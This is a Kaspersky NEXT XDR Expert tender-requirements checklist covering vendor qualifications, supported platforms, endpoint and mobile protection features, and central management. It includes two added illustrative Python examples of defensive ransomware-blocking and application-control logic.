Kaspersky NEXT XDR Expert RFX Tender Requirements 0724 en

The Kaspersky NEXT XDR document outlines the RFx/Tender requirements for Kaspersky's cybersecurity solutions, specifying vendor qualifications, system compatibility, and functional capabilities. Key requirements include a reputable vendor with at least 20 years of experience, comprehensive support for various operating systems, and advanced threat detection features. The document emphasizes the need for a unified management interface, customizable dashboards, and robust protection mechanisms against malware and ransomware.

Uploaded by

Ahnaf Tahmeed

Kaspersky NEXT XDR Expert
RFx/Tender requirements

Kaspersky

03.07.2024
Changelog

27.06.2024 Version 1.0 has been created for the following applications:

• Kaspersky Security Center for Windows 14.2
• Kaspersky Security Center for Linux 15.0
• Kaspersky Security Center Cloud Console 15.0.152
• Kaspersky Endpoint Security Cloud 24.6
• Kaspersky Endpoint Security for Windows 12.4
• Kaspersky Endpoint Security for Linux 12.0
• Kaspersky Endpoint Security for Mac 12.0
• Kaspersky Endpoint Detection and Response 6.1
• Kaspersky Unified Monitoring and Analysis Platform 3.1
• Kaspersky Extended Detection and Response 1.1

№ | Requirement | Compliance (Yes/No) | Comment

Vendor requirements

1. Vendor must be a reputable company that has been present in the cybersecurity business for at least 20 years.

2. Vendor experts must have proven experience in the discovery of acknowledged vulnerabilities.

3. Vendor must possess a range of security intelligence services that demonstrate overall strength in the domain.

4. Vendor must be able to deliver training on the ATP and/or EDR solution on request. Training must be of at least two distinct types: one for deploying, administering and maintaining the solution, the other for operating the solution from a security analyst's perspective.

5. Vendor must be able to deliver Incident Response services if needed.

6. Vendor should have Threat Intelligence offerings in its portfolio in the form of downloadable reports on new threats, IOC data, regularly updated Threat Feeds, etc.

7. Vendor should be able to deliver managed Threat Hunting services.

8. Vendor must have a premium technical support offering for the ATP and EDR solution.

9. To demonstrate the capability of the respondent's threat research or labs team, the vendor must have a research team that has published not less than 100 papers on APT campaigns and threat actors during the last year.

System requirements (SMP and SMP agents)

10. The proposed solution must support the operating systems below:

Workstations
• Windows 7 Home / Professional / Ultimate / Enterprise Service Pack 1 or later
• Windows 8 Professional / Enterprise
• Windows 8.1 Professional / Enterprise
• Windows 10 Home / Pro / Pro for Workstations / Education / Enterprise / Enterprise multi-session
• Windows 11 Home / Pro / Pro for Workstations / Education / Enterprise

Servers
• Windows Small Business Server 2011 Essentials / Standard (64-bit)
• Windows MultiPoint Server 2011 (64-bit)
• Windows Server 2008 R2 Foundation / Standard / Enterprise / Datacenter Service Pack 1 or later
• Windows Web Server 2008 R2 Service Pack 1 or later
• Windows Server 2012 Foundation / Essentials / Standard / Datacenter (including Core Mode)
• Windows Server 2012 R2 Foundation / Essentials / Standard / Datacenter (including Core Mode)
• Windows Server 2016 Essentials / Standard / Datacenter (including Core Mode)
• Windows Server 2019 Essentials / Standard / Datacenter (including Core Mode)
• Windows Server 2022 Standard / Datacenter / Datacenter: Azure Edition (including Core Mode)

Microsoft Terminal Servers
• Microsoft Remote Desktop Services based on Windows Server 2008 R2 SP1
• Microsoft Remote Desktop Services based on Windows Server 2012
• Microsoft Remote Desktop Services based on Windows Server 2012 R2
• Microsoft Remote Desktop Services based on Windows Server 2016
• Microsoft Remote Desktop Services based on Windows Server 2019
• Microsoft Remote Desktop Services based on Windows Server 2022

32-bit Linux operating systems:
• CentOS 6.7 and later
• Debian GNU/Linux 11.0 and later
• Debian GNU/Linux 12.0 and later
• Mageia 4
• Red Hat Enterprise Linux 6.7 and later
• ALT 8 SP Workstation
• ALT 8 SP Server
• ALT Workstation 10
• ALT SP Workstation release 10

64-bit Linux operating systems:
• AlmaLinux OS 8 and later
• AlmaLinux OS 9 and later
• AlterOS 7.5 and later
• Amazon Linux 2
• Astra Linux Common Edition 2.12
• Astra Linux Special Edition RUSB.10015-01 (operational update 1.5)
• Astra Linux Special Edition RUSB.10015-01 (operational update 1.6)
• Astra Linux Special Edition RUSB.10015-01 (operational update 1.7)
• Astra Linux Special Edition RUSB.10015-16 (release 1) (operational update 1.6)
• CentOS 6.7 and later
• CentOS 7.2 and later
• CentOS Stream 8
• CentOS Stream 9
• Debian GNU/Linux 11.0 and later
• Debian GNU/Linux 12.0 and later
• EMIAS 1.0 and later
• EulerOS 2.0 SP5
• Kylin 10
• Linux Mint 20.3 and later
• Linux Mint 21.1 and later
• openSUSE Leap 15.0 and later
• Oracle Linux 7.3 and later
• Oracle Linux 8.0 and later
• Oracle Linux 9.0 and later
• Red Hat Enterprise Linux 6.7 and later
• Red Hat Enterprise Linux 7.2 and later
• Red Hat Enterprise Linux 8.0 and later
• Red Hat Enterprise Linux 9.0 and later
• Rocky Linux 8.5 and later
• Rocky Linux 9.1
• SberLinux 8.8 (Dykhtau)
• SUSE Linux Enterprise Server 12.5 or later
• SUSE Linux Enterprise Server 15 or later
• Ubuntu 20.04 LTS
• Ubuntu 22.04 LTS
• ALT 8 SP Workstation
• ALT 8 SP Server
• ALT Workstation 10
• ALT Server 10
• ALT SP Workstation release 10
• ALT SP Server release 10
• Atlant, Alcyone build, version 2022.02
• GosLinux 7.17
• GosLinux 7.2
• MSVSPHERE 9.2 SERVER
• MSVSPHERE 9.2 ARM
• RED OS 7.3
• ROSA Cobalt 7.9
• ROSA Chrome 12
• SynthesisM Client 8.6
• SynthesisM Server 8.6

64-bit Arm operating systems:
• Astra Linux Special Edition RUSB.10152-02 (operational update 4.7)
• CentOS Stream 9
• EulerOS 2.0 SP8
• SUSE Linux Enterprise Server 15
• Ubuntu 22.04 LTS
• ALT Workstation 10
• ALT Server 10
• ALT SP Workstation release 10
• ALT SP Server release 10
• RED OS 7.3

macOS operating systems:
• macOS 12 – 14

macOS virtualization tools:
• Parallels Desktop 16 for Mac Business Edition
• VMware Fusion 11.5 Professional
• VMware Fusion 12 Professional

11. The proposed solution must support the following virtual platforms:
• Oracle Linux 8.6 and later
• Ubuntu Server 22.04 and later

12. The proposed solution must support deployment to the operating systems below:
• VMware Workstation 17.0.2 Pro
• VMware ESXi 8.0 Update 2
• Microsoft Hyper-V Server 2019
• Citrix Virtual Apps and Desktops 7 2308
• Citrix Provisioning 2308
• Citrix Hypervisor 8.2 (Cumulative Update 1)
• Oracle Linux 8.6 and later
• Ubuntu Server 22.04 and later

13. The proposed solution must support protection of the latest operating system versions across all platforms (Windows, Linux, macOS, iOS, Android).

Functional requirements (SMP and SMP agents)

1. The solution must provide a single web-based user interface for central management, incident investigation and response, so that administrators and analysts can monitor the entire infrastructure at a glance.

2. The solution must support different administrator roles that share a single interface/dashboard at sign-on, with access controlled by privileges and rights assigned according to their function (Administrator, Reviewer, Investigator, etc.).

3. The solution must support the creation of custom dashboards based on SQL-like search queries on collected events.

4. Dashboards must support the ability to have several different widgets.

5. Reports and dashboards should be easily editable and customizable according to the needs of solution administrators. The solution must support the creation of reports based on any field in the received security events.

6. The solution must provide the ability to export reports to HTML, PDF, CSV, Split CSV and Excel.

7. The solution must provide the ability to export event search results into at least one of the following formats: CSV, TXT, TSV.

8. The proposed solution must support the Antimalware Scan Interface (AMSI).

9. The proposed solution must have the ability to integrate with Windows Defender Security Center.

10. The proposed solution must support the Windows Subsystem for Linux.

11. The proposed solution must provide next-gen protection technologies, for example:
• protection against file-less threats
• multi-layered Machine Learning (ML) based protection and behavioral analysis during different stages of the kill chain

12. The proposed solution must provide Memory Scanning for Windows workstations.

13. The proposed solution must provide Kernel Memory Scanning for Linux workstations.

14. The proposed solution must provide the ability to switch to cloud mode for threat protection, decreasing RAM and hard disk drive usage on resource-limited machines.

15. The proposed solution must have dedicated components to monitor, detect and block activities on Windows, Linux and Windows servers and endpoints, to protect against remote encryption attacks.

16. The proposed solution must include signatureless components to detect threats even without frequent updates. Protection must be powered by Static ML for the pre-execution stage and Dynamic ML for the post-execution stage of the kill chain, on endpoints and in the cloud, for Windows servers and workstations.

17. The proposed solution must provide behavioral analysis based on ML.

18. The proposed solution must provide the ability to integrate with the vendor's own Endpoint Detection and Response (EDR) and Anti-APT solutions, for active threat hunting and automated incident response.

19. The proposed solution must support integration with a standalone/independent automated threat detection and prevention sandbox solution that does not depend on the vendor's EDR and/or Anti-APT solution.

20. The proposed solution must include the ability to configure and manage the firewall settings built into the Windows Server and Linux operating systems through its management console.

21. The proposed solution must include the following components in a single agent installed on the endpoint:
• Application, Web and Device Controls
• HIPS and Firewall
• Patch Management
• Encryption

22. The proposed solution must provide Application and Device Controls for Windows workstations.

23. The proposed solution must include Application Launch/Start Control for the Windows Server operating system.

24. The proposed solution's protection for servers and workstations must include a dedicated component for protection against ransomware/crypto-virus activity on shared resources.

25. On detecting ransomware/cryptor-like activity, the proposed solution must automatically block the attacking computer for a specified interval and list the attacking computer's IP address, the timestamp and the threat type.
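The mechanism behind requirement 25 (count encryption-like file operations per client host on a share, block the host for a fixed interval once a threshold is crossed, unblock automatically when the interval elapses, and keep a record of IP, timestamp and threat type) can be shown with a small sliding-window detector. This is an added example written for this page; it is not code from the requirements document or from any Kaspersky product. The event format, the `.locked`/`.crypt`/`.enc` extension list, the threshold and window sizes, the 30-minute block interval and the 10.0.0.x addresses are all constructed assumptions.

```python
"""Toy detector for encryption-like activity on a shared folder.

Added example; not part of the requirements document and not Kaspersky's
implementation. Event format, thresholds, extension list and IP addresses
are constructed for illustration only.
"""
import os
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class FileEvent:
    """One file operation on the share as the file server sees it (constructed format)."""
    ts: datetime
    client_ip: str
    op: str        # "write" or "rename"
    path: str


@dataclass
class BlockEntry:
    """Record kept for each blocked host: who, when, until when, and why."""
    ip: str
    blocked_at: datetime
    expires_at: datetime
    threat_type: str


# Extensions typical of encrypted output; a hypothetical list for the example.
SUSPICIOUS_EXT = {".locked", ".crypt", ".enc"}
THREAT_TYPE = "Encryption-like activity on shared resource"


class ShareGuard:
    """Counts suspicious writes/renames per client in a sliding window and
    blocks the client for a fixed interval once the threshold is reached."""

    def __init__(self, threshold=20, window=timedelta(seconds=30),
                 block_for=timedelta(minutes=30)):
        self.threshold = threshold
        self.window = window
        self.block_for = block_for
        self._recent = defaultdict(deque)   # ip -> timestamps of suspicious ops
        self.blocklist = {}                 # ip -> active BlockEntry
        self.log = []                       # every block decision ever taken

    def is_blocked(self, ip, now):
        entry = self.blocklist.get(ip)
        if entry is None:
            return False
        if entry.expires_at > now:
            return True
        del self.blocklist[ip]              # interval elapsed: unblock automatically
        return False

    def observe(self, ev):
        """Return 'denied' (host already blocked), 'blocked' (threshold just
        reached, host is blocked from now on) or 'allowed'."""
        if self.is_blocked(ev.client_ip, ev.ts):
            return "denied"
        _, ext = os.path.splitext(ev.path)
        if ev.op in ("write", "rename") and ext.lower() in SUSPICIOUS_EXT:
            recent = self._recent[ev.client_ip]
            recent.append(ev.ts)
            while recent and ev.ts - recent[0] > self.window:
                recent.popleft()            # drop operations outside the window
            if len(recent) >= self.threshold:
                entry = BlockEntry(ev.client_ip, ev.ts, ev.ts + self.block_for, THREAT_TYPE)
                self.blocklist[ev.client_ip] = entry
                self.log.append(entry)
                recent.clear()
                return "blocked"
        return "allowed"

    def report(self):
        """The information requirement 25 asks for: IP, timestamp, threat type."""
        return [{"ip": e.ip, "timestamp": e.blocked_at.isoformat(),
                 "threat_type": e.threat_type} for e in self.log]


def verdict_counts(verdicts, ip):
    """Count verdicts per host from a list of (ip, verdict) pairs."""
    counts = {}
    for host, verdict in verdicts:
        if host == ip:
            counts[verdict] = counts.get(verdict, 0) + 1
    return counts


def run_sample():
    """Replay a constructed event stream: one ordinary host and one host that
    renames many files to a ransomware-style extension within seconds."""
    base = datetime(2024, 7, 3, 9, 0, 0)   # constructed timestamp
    events = []
    for i in range(30):                    # benign: 30 document writes over 60 s
        events.append(FileEvent(base + timedelta(seconds=2 * i), "10.0.0.5",
                                "write", f"/share/report{i}.docx"))
    for i in range(25):                    # suspicious: 25 renames in 12 s
        events.append(FileEvent(base + timedelta(milliseconds=500 * i), "10.0.0.9",
                                "rename", f"/share/data{i}.xlsx.locked"))
    # same host again inside the block interval, then after it has expired
    events.append(FileEvent(base + timedelta(minutes=1), "10.0.0.9", "write", "/share/x.txt"))
    events.append(FileEvent(base + timedelta(minutes=31), "10.0.0.9", "write", "/share/y.txt"))
    events.sort(key=lambda e: e.ts)
    guard = ShareGuard(threshold=20, window=timedelta(seconds=30),
                       block_for=timedelta(minutes=30))
    verdicts = [(ev.client_ip, guard.observe(ev)) for ev in events]
    return guard, verdicts


if __name__ == "__main__":
    g, v = run_sample()
    print(g.report())
    print(verdict_counts(v, "10.0.0.9"))
```

In the sample stream the 20th rename to `.locked` trips the threshold, so the remaining renames and the write one minute later from that host are denied, while the write 31 minutes later is allowed again because the block interval has elapsed; the benign host is never affected. A production implementation would also take into account content entropy or canary files rather than extensions alone, but the block/record/expire cycle is the part requirement 25 describes.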

26. The proposed solution must provide a pre-defined list of scan exclusions for Microsoft applications and services.

27. The proposed solution should support the installation of endpoint protection on servers without the need to restart.

28. The proposed solution must enable the following for endpoints:
• Manual Scanning
• On-Access Scanning
• On-Demand Scanning
• Compressed File Scanning
• Scanning of individual files, folders and drives
• Script Blocking and Scanning
• Registry Guard
• Buffer Overflow Protection
• Background/Idle Scanning
• Removable Drive Scanning on connection to the system
• The ability to detect and block untrusted hosts on detection of encryption-like activities on server shared resources

29. The proposed solution should be password-protected to prevent the AV process from being halted/killed and to provide self-protection, regardless of the user's authorization level on the system.

30. The proposed solution must have both local and global reputation databases.

31. The proposed solution must be able to scan HTTPS, HTTP and FTP traffic for viruses, spyware and any other malware.

32. The proposed solution must include a personal firewall capable, as an absolute minimum, of:
• Blocking network activities of applications based on their categorization.
• Blocking/allowing specific packets, protocols, IP addresses, ports and traffic direction.
• The automatic and manual addition of network subnets, and modification of network activity permissions.

33. The proposed solution must prevent the connection of reprogrammed USB devices emulating keyboards and enable control of the use of on-screen keyboards for authorization.

34. The proposed solution must be able to block network attacks and report the source of the infection.

35. The proposed solution must have local storage on endpoints to keep copies of files that have been deleted or modified during disinfection. These files must be stored in a specific format that ensures they cannot pose any threat.

36. The proposed solution must have a proactive approach to preventing malware from exploiting existing vulnerabilities on servers and workstations.

37. The proposed solution must support AM-PPL (Anti-Malware Protected Process Light) technology for protection against malicious actions.

38. The proposed solution must include protection against attacks that exploit weaknesses in the ARP protocol to spoof the device MAC address.

39. The proposed solution must include a control component able to learn to recognize typical user behavior on a specific individual or group of protected computers, then identify and block anomalous and potentially harmful actions made by that endpoint or user.

40. The proposed solution must provide Anti-Bridging functionality for Windows workstations to prevent unauthorized bridges to the internal network that bypass perimeter protection tools. Administrators should be able to ban the establishment of simultaneous wired, Wi-Fi and modem connections.

41. The proposed solution must include a dedicated component for scanning encrypted connections.

42. The proposed solution must be able to decrypt and scan network traffic transmitted over encrypted connections.

43. The proposed solution must have the ability to automatically exclude web resources when a scan error occurs while performing an encrypted connection scan. This exclusion must be unique to the host and must not be shared with other endpoints.

44. The proposed solution must include functionality to remotely wipe data on the endpoint (for workstations).

45. The proposed solution must include functionality to automatically delete the data if there is no connection to the endpoint management server.

46. The proposed solution must support signature-based detection in addition to cloud-assisted and heuristic detection.

47. The proposed solution should have the ability to raise an alert on, clean, and delete a detected threat.

48. The proposed solution should have the ability to accelerate scanning tasks by skipping objects that have not changed since the previous scan.

49. The proposed solution should have the ability to prioritize custom and on-demand scanning tasks for Linux workstations.

50. The proposed solution must allow the administrator to exclude specified files/folders/applications/digital certificates from being scanned, either on access (real-time protection) or during on-demand scans.

51. The proposed solution should include the functionality to isolate infected computers.

52. The proposed solution must automatically scan removable drives for malware when they are attached to any endpoint. Scan control should be based on drive size.

53. The proposed solution must be able to block the use of USB storage devices or allow access only to permitted devices, and allow read/write access only to domain users, to reduce data theft and enforce lock policies.

54. The proposed solution must be able to differentiate between USB storage devices, printers, mobiles and other peripherals.

55. The proposed solution must be able to log file operations (Write and Delete) on USB storage devices. This should not require any additional license or component to be installed on the endpoint.

56. The proposed solution must have the ability to block the execution of any executable from a USB storage device.

57. The proposed solution must have the ability to block/allow user access to web resources based on website, content type, user and time of day.

58. The proposed solution must have a specific detection category to block website banners.

59. The proposed solution must provide the ability to configure Wi-Fi networks based on Network Name, Authentication Type and Encryption Type, so these can later be used to block or allow the Wi-Fi connections.

60. The proposed solution must support user-based policies for Device, Web and Application Control.

61. The proposed solution should specifically allow the blocking of the following devices:
• Bluetooth
• Mobile devices
• External modems
• CD/DVDs
• Cameras and scanners
• MTP devices
• And the transfer of data to mobile devices

62. The proposed solution should feature cloud integration, to provide the fastest possible updates on malware and potential threats.

63. The proposed solution must have the ability to manage user access rights for Read and Write operations on CDs/DVDs, removable storage devices and MTP devices.

64. The proposed solution must feature firewall filtering by local address, physical interface and packet Time-To-Live (TTL).

65. The proposed solution must allow the administrator to monitor an application's use of custom/random ports after it has launched.

66. The proposed solution must support the blocking of prohibited (Deny-List) applications from being launched on the endpoint, and the blocking of all applications other than those included in Allow-Lists.

67. The proposed solution must have a cloud-integrated Application Control component for immediate access to the latest updates on application ratings and categories.

68. The proposed solution must offer protection to files executed in Windows Server containers.

69. The proposed solution must include traffic malware filtering, web link verification and web-resource control based on cloud categories.

70. The proposed solution's Web Control/Restriction component must include a Cryptocurrencies and Mining category. It must also include predefined regional legal restrictions to comply with Belgian and Japanese law.

71. The proposed solution must have the ability to allow applications based on their digital signature certificates, MD5, SHA256, metadata, file path and pre-defined security categories.

72. The proposed solution must have controls for the loading of DLLs and drivers.

73. The proposed solution's application control component must include Deny List and Allow List operational modes.

74. The proposed solution must support the control of scripts run from PowerShell.

75. The proposed solution must support Test Mode with report generation on the launch of blocked applications.
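Requirements 66, 71, 73 and 75 together describe an Application Control policy engine: rules keyed on hash, path or signing certificate, evaluated either in Deny List mode (block what matches) or Allow List mode (block what does not match), with a Test Mode that reports would-be blocks without enforcing them. The following is an added example written for this page, not code from the document or from any Kaspersky product; the rule kinds, the constructed binaries and their contents, the Windows paths and the signer name "Example Software Ltd" are all assumptions.

```python
"""Toy Application Control policy engine: Allow List / Deny List modes
with an optional Test Mode that reports instead of blocking.

Added example; not part of the requirements document and not Kaspersky's
implementation. Rule kinds, sample binaries, paths and signer names are
constructed for illustration only.
"""
import fnmatch
import hashlib
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Launch:
    """An attempted application start as the agent would see it (constructed)."""
    path: str
    content: bytes          # file bytes, hashed on the fly
    signer: Optional[str]   # subject of the code-signing certificate, None if unsigned


@dataclass(frozen=True)
class Rule:
    kind: str    # "sha256", "md5", "path" (glob) or "signer"
    value: str


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


class AppControl:
    """mode="deny": launches matching any rule are blocked, the rest run.
    mode="allow": only launches matching a rule run, the rest are blocked.
    test_mode=True: nothing is blocked; would-be blocks are only reported."""

    def __init__(self, mode, rules, test_mode=False):
        if mode not in ("allow", "deny"):
            raise ValueError("mode must be 'allow' or 'deny'")
        self.mode = mode
        self.rules = list(rules)
        self.test_mode = test_mode
        self.report = []    # launches that were (or in Test Mode would have been) blocked

    @staticmethod
    def _matches(launch, rule):
        if rule.kind == "sha256":
            return sha256_hex(launch.content) == rule.value.lower()
        if rule.kind == "md5":
            return md5_hex(launch.content) == rule.value.lower()
        if rule.kind == "path":
            return fnmatch.fnmatchcase(launch.path, rule.value)
        if rule.kind == "signer":
            return launch.signer is not None and launch.signer == rule.value
        raise ValueError(f"unknown rule kind {rule.kind!r}")

    def evaluate(self, launch):
        matched = next((r for r in self.rules if self._matches(launch, r)), None)
        should_block = (matched is not None) if self.mode == "deny" else (matched is None)
        if should_block:
            self.report.append({"path": launch.path, "mode": self.mode,
                                "matched_rule": matched, "enforced": not self.test_mode})
        action = "blocked" if (should_block and not self.test_mode) else "allowed"
        return {"action": action, "would_block": should_block, "matched_rule": matched}


def run_sample():
    """Evaluate three constructed launches under Deny, Allow and Allow+Test modes."""
    editor = Launch(r"C:\Program Files\Editor\editor.exe", b"constructed editor binary",
                    "Example Software Ltd")
    tool = Launch(r"C:\Users\alice\Downloads\tool.exe", b"constructed unknown binary", None)
    updater = Launch(r"C:\Windows\Temp\upd.exe", b"constructed updater", "Example Software Ltd")
    launches = [editor, tool, updater]

    deny_rules = [Rule("path", r"C:\Users\*\Downloads\*"),        # anything run from Downloads
                  Rule("sha256", sha256_hex(b"constructed updater"))]  # one specific binary
    allow_rules = [Rule("signer", "Example Software Ltd"),          # trusted publisher
                   Rule("path", r"C:\Program Files\*")]              # trusted install location

    deny_ctl = AppControl("deny", deny_rules)
    allow_ctl = AppControl("allow", allow_rules)
    test_ctl = AppControl("allow", allow_rules, test_mode=True)
    return {
        "deny": [deny_ctl.evaluate(l)["action"] for l in launches],
        "allow": [allow_ctl.evaluate(l)["action"] for l in launches],
        "test": [test_ctl.evaluate(l)["action"] for l in launches],
        "test_report": test_ctl.report,
    }


if __name__ == "__main__":
    for k, v in run_sample().items():
        print(k, v)
```

The same unsigned download is blocked under both modes, while the updater shows why the two modes differ: the deny list catches it by hash, the allow list lets it through because of its publisher. Running the allow list in Test Mode first gives the report of launches that would have been blocked, which is what requirement 75 is for: tuning the rule set before enforcing it.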

76. The proposed solution must have the ability to restrict application activities within the system according to the trust level assigned to the application, and to limit the rights of applications to access certain resources, including system and user files ("HIPS functionality").

77. The proposed solution must have the ability to control system/user application access to audio and video recording devices.

78. The proposed solution must provide a facility to check the applications listed in each cloud-based category.

79. The proposed solution must have the ability to integrate with a vendor-specific Advanced Threat Protection system.

80. The proposed solution must have the ability to automatically regulate the activity of running programs, including access to the file system and registry as well as interaction with other programs.

81. The proposed solution must have the ability to automatically delete Application Control rules if an application is not launched during a specified interval. The interval must be configurable.

82. The proposed solution must have the ability to automatically categorize applications launched prior to endpoint protection installation.

83. The proposed solution must have endpoint mail threat protection with:
• An attachment filter and the ability to rename attachments.
• Scanning of mail messages when receiving, reading and sending.

84. The proposed solution must have the ability to scan multiple redirects, shortened URLs, hijacked URLs and time-based delays.

85. The proposed solution must enable the user of the computer to check a file's reputation from the file context menu.

86. The proposed solution must include the scanning of all scripts, including those developed for Microsoft Internet Explorer, as well as any WSH scripts (JavaScript, Visual Basic Script, etc.), launched while the user works on the computer, including on the internet.

87. The proposed solution must provide protection against as yet unknown malware based on analysis of its behavior and examination of changes in the system registry, together with a strong remediation engine that automatically restores any system changes made by the malware.

88. The proposed solution must provide protection against hacker attacks by using a firewall with an intrusion detection and prevention system (IDS/IPS) and network activity rules for the most popular applications when working in computer networks of any type, including wireless networks.

89. The proposed solution must include IPv6 protocol support.

90. The proposed solution must offer scanning of critical sections of the computer as a standalone task.

91. The proposed solution must incorporate Application Self-Protection technology:
• protecting against unauthorized remote management of an application service.
• protecting access to application parameters by setting a password.
• preventing the disabling of protection by malware, criminals or inexperienced users.

92. The proposed solution must offer the ability to choose which threat protection components to install.

93. The proposed solution must include antivirus checking and disinfection of files that have been packed using programs like PKLITE, LZEXE, DIET, EXEPACK, etc.

94. The proposed solution must include anti-malware checking and disinfection of files in archives using the RAR, ARJ, ZIP, CAB, LHA, JAR and ICE formats, including password-protected files.

95. The proposed solution must protect against as yet unknown malware belonging to registered families, based on heuristic analysis.

96. The proposed solution must include multiple ways to notify the administrator about important events which have taken place (mail notification, audible announcement, pop-up window, log entry).

97. The proposed solution must allow the administrator to create a single installer with the required configuration, for use by non-IT-literate users.

98. The proposed solution must allow monitoring of the use of cloud services on managed devices running Windows.

99. The proposed solution must support installation in an EDR Agent configuration, allowing installation alongside third-party solutions.

100. The proposed solution must support usage in Light Agent mode to protect virtual environments, or in standalone mode.

Mobile Device Management (SMP and SMP agents)

1. The proposed solution should be able to protect or manage mobile devices running Android:
• Android 5.0 or later (including Android 12L, excluding Go Edition)

2. The proposed solution should be able to protect or manage iOS mobile devices:
• iOS 10–17 or iPadOS 13–17

3. The proposed solution must support Android Device Owner devices.

4. The proposed solution must support iOS supervised devices.

5. The proposed solution must enable protection of the smartphone file system and the interception and scanning of all incoming objects transferred through wireless connections (infrared port, Bluetooth), EMS and MMS, while synchronizing with a personal computer, and when uploading files through a browser.

6. The proposed solution must have the ability to block malicious sites designed to spread malicious code, and phishing websites designed to steal confidential user data and access the user's financial information.

7. The proposed solution must have the functionality to add a website excluded from the scan to an Allow List.

8. The proposed solution must include website filtering by categories and allow the administrator to restrict user access to specific categories (for example, gambling-related websites or social media categories).

9. The proposed solution must enable the administrator to obtain information about the operation of antivirus and web protection on the user's mobile device.

10. The proposed solution must have the functionality to detect the location of the mobile device via GPS and show it on Google Maps.

11. The proposed solution must enable the administrator to take a picture (mugshot) with the front camera of the mobile device when it is locked.

12. The proposed solution must have containerization capabilities for Android devices.

13. The proposed solution must have the functionality to remotely wipe the following from Android devices:
• containerized data
• corporate email accounts
• settings for connecting to the corporate Wi-Fi network and VPN
• Access Point Name (APN)
• Android for Work profile
• KNOX container
• KNOX License Manager key

14. The proposed solution must have the functionality to remotely wipe the following from iOS devices:
• All installed configuration profiles
• All provisioning profiles
• The iOS MDM profile
• Applications for which the Remove and iOS MDM profile check boxes have been selected

15. The proposed solution must allow the encryption of all data on the device (including user account data, removable drives and apps, as well as email messages, SMS messages, contacts, photos and other files). Access to encrypted data should only be possible on an unlocked device through a special key or the device unlock password.

16. The proposed solution must offer controls to ensure that all devices comply with corporate security requirements. Compliance Control should be based on a set of rules which should include the following components:
• Device check criteria
• Time period allocated for the user to fix the non-compliance
• Action that will be taken on the device if the user does not fix the non-compliance within the set period
• Ability to remediate non-compliant devices

17. The proposed solution must have the functionality to detect device hacks (e.g., rooting, jailbreak) and notify the administrator about them.

18. The proposed solution should enable management of at least the following device features:
• Memory cards and other removable drives
• Device camera
• Wi-Fi connections
• Bluetooth connections
• Infrared connection port
• Wi-Fi access point activation
• Remote desktop connection
• Desktop synchronization
• Configure Exchange Mailbox settings
• Configure mailbox on iOS MDM devices
• Configure Samsung KNOX containers
• Configure the settings of the Android for Work profile
• Configure Email/Calendar/Contacts
• Configure media content restriction settings
• Configure proxy settings on the mobile device
• Configure certificates and SCEP

19. The proposed solution should allow the configuration of a connection to AirPlay devices to enable the streaming of music, photos and videos from the iOS MDM device to AirPlay devices.

20. The proposed solution must support all the deployment methods below for the mobile agent:
• Google Play, Huawei App Gallery and Apple App Store
• KNOX Mobile Enrollment portal
• Standalone preconfigured installation packages

21. The proposed solution must allow the configuration of Access Point Names (APN) to connect a mobile device to data transfer services on a mobile network.

22. The proposed solution must allow the PIN on a mobile device to be reset remotely.

23. The proposed solution must include the option to enroll Android devices using third-party EMM systems:
• VMware AirWatch 9.3 or later
• MobileIron 10.0 or later
• IBM MaaS360 10.68 or later
• Microsoft Intune 1908 or later
• SOTI MobiControl 14.1.4 (1693) or later

24. The proposed solution must have the functionality to enforce the installation of a mandatory app on the device.

25. The proposed solution must support user-initiated mobile agent deployment via:
• Google Play
• Huawei App Gallery
• Apple App Store

26. The proposed solution must be able to scan files opened on the device.

27. The proposed solution must be able to scan programs installed from the device interface.

28. The proposed solution must be able to scan file system objects on the device or on connected memory extension cards on request of the user or according to a schedule.

29. The proposed solution must provide reliable isolation of infected objects in a quarantine storage location.

30. The proposed solution must feature updating of the antivirus databases used to search for malicious programs and delete dangerous objects.

31. The proposed solution must be able to scan mobile devices for malware and other unwanted objects on demand and on schedule, and deal with them automatically.

32. The proposed solution must be able to manage and monitor mobile devices from the same console as that used to manage computers and servers.

33. The proposed solution must provide Anti-Theft functionality, so that lost and/or misplaced devices can be located, locked and wiped remotely.

34. The proposed solution must provide the facility to block forbidden applications from being launched on the mobile device.

35. The proposed solution must be able to enforce security settings, such as password restrictions and encryption, on mobile devices.

36. The proposed solution must have the ability to push applications recommended/required by the administrator to the mobile phone.

37. The proposed solution must have Application Control with Forbidden/Allowed application modes.

38. The proposed solution must include a subscription model.

39. The proposed solution must protect against online threats on iOS devices.

Centralized administration, monitoring, and update software requirements (SMP and SMP agents)

1. The proposed solution must support installation on the following


Operating Systems:
Windows:
 Windows Server 2008 R2 Standard with Service Pack 1 and
later 64-bit
 Windows Server 2012 Server Core 64-bit
 Windows Server 2012 Datacenter 64-bit
 Windows Server 2012 Essentials 64-bit
 Windows Server 2012 Foundation 64-bit
 Windows Server 2012 Standard 64-bit
 Windows Server 2012 R2 Server Core 64-bit
 Windows Server 2012 R2 Datacenter 64-bit
 Windows Server 2012 R2 Essentials 64-bit
 Windows Server 2012 R2 Foundation 64-bit
 Windows Server 2012 R2 Standard 64-bit
 Windows Server 2016 Datacenter (LTSB) 64-bit
 Windows Server 2016 Standard (LTSB) 64-bit
 Windows Server 2016 Server Core (Installation Option) (LTSB)
64-bit
 Windows Server 2019 Standard 64-bit
 Windows Server 2019 Datacenter 64-bit
 Windows Server 2019 Core 64-bit
 Windows Server 2022 Standard 64-bit
 Windows Server 2022 Datacenter 64-bit
 Windows Server 2022 Core 64-bit
 Windows Storage Server 2012 64-bit
 Windows Storage Server 2012 R2 64-bit
 Windows Storage Server 2016 64-bit
 Windows Storage Server 2019 64-bit
Linux:
 Debian GNU/Linux 10.x (Buster) 64-bit
 Debian GNU/Linux 11.x (Bullseye) 64-bit
 Debian GNU/Linux 12 (Bookworm) 64-bit
 Ubuntu Server 18.04 LTS (Bionic Beaver) 64-bit
 Ubuntu Server 20.04 LTS (Focal Fossa) 64-bit
 Ubuntu Server 22.04 LTS (Jammy Jellyfish) 64-bit
 CentOS 7.x 64-bit
 CentOS Stream 9 64-bit
 Red Hat Enterprise Linux Server 7.x 64-bit
 Red Hat Enterprise Linux Server 8.x 64-bit
 Red Hat Enterprise Linux Server 9.x 64-bit
 SUSE Linux Enterprise Server 12 (all Service Packs) 64-bit
 SUSE Linux Enterprise Server 15 (all Service Packs) 64-bit
 Astra Linux Special Edition RUSB.10015-01 (operational
